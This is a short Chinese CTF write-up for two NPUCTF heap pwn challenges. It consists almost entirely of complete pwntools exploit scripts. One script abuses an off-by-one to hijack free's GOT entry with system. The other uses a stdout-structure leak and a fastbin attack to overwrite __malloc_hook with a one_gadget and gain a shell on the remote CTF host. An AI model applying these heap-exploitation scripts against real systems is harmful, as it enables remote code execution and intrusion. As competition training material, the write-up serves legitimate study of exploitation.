NPUCTF pwn

題目質量很高萌新直接自閉
z這2道題都挺基礎的

easy_heap

exp:
off by one 造成了任意地址寫的漏洞

#!/usr/bin/python2
from pwn import *
p=0
def pwn():
	global p
	#p=process('./pwn')
	p=remote('ha1cyon-ctf.fun',30179)
	elf=ELF('./pwn')
	libc=elf.libc
	sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
	sda=lambda data,data1:p.sendafter('%s'%(data),data1)
	def add(size,data):
		sla(' :','1')
		sla(' : ',str(size))
		sla(':',data)

	def edit(idx,data):
		sla(' :','2')
		sla(' :',str(idx))
		sda(': ',data)

	def show(idx):
		sla(' :','3')
		sla(' :',str(idx))

	def delete(idx):
		sla(' :','4')
		sla(' :',str(idx))

	add(0x18,'\x02'*2)#0
	add(0x18,'\x03'*3)#1
	add(0x18,'/bin/sh\x00')#2
	edit(0,'a'*0x18+'\x41')
	delete(1)
	payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
	add(0x38,payload)
	show(1)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
	system=libcbase+libc.sym['system']
	edit(1,p64(system))
	delete(2)
	p.interactive()

if __name__=="__main__":
	pwn()

BAD GUY

通過寫IO結構體拿到libc地址然後就是正常的fastbin attack
exp:

from pwn import *
p=0
def pwn(ip,port,debug):
	global p
	if debug==1:
		p=process('./pwn1')
		elf=ELF('./pwn1')
		libc=elf.libc
	else:
		p=remote(ip,port)
		elf=ELF('./pwn1')
		libc=elf.libc
	sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
	sda=lambda data,data1:p.sendafter('%s'%(data),data1)
	def add(idx,size,data):
		sla('>> ','1')
		sla(' :',str(idx))
		sla(': ',str(size))
		sda(':',data)

	def edit(idx,size,data):
		sla('>> ','2')
		sla(' :',str(idx))
		sla(': ',str(size))
		sda(': ',data)

	def delete(idx):
		sla('>> ','3')
		sla(' :',str(idx))

	add(0,0x18,'\x02'*2)
	add(1,0x28,'\x03'*3)
	add(2,0x68,'\x04'*4)
	add(3,0x18,'\x05'*5)
	add(4,0x68,'\x06'*6)
	add(5,0x28,'\x07'*7)
	payload='a'*0x18+p64(0xa1)
	edit(0,len(payload),payload)
	delete(1)
	delete(2)
	add(1,0x28,'\x08'*8)
	payload='a'*0x20+p64(0)+p64(0x71)+'\xdd\x25'
	edit(1,len(payload),payload)
	add(6,0x68,'dd')
	add(7,0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-3954176
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	one_gadget=libcbase+o_g[1]
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	realloc=libcbase+libc.sym['__libc_realloc']
	delete(4)
	payload='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
	edit(3,len(payload),payload)
	log.success('libcbase: '+hex(libcbase))
	add(2,0x68,'dodou')
	add(8,0x68,'a'*11+p64(one_gadget)+p64(realloc+9))
	sla('>> ','1')
	sla(' :',str(10))
	sla(': ',str(2))
	p.interactive()
	return True

if __name__=='__main__':
	while 1:
		try:
			if pwn('ha1cyon-ctf.fun',30215,0)==True:
				break
		except Exception as e:
			p.close()
			continue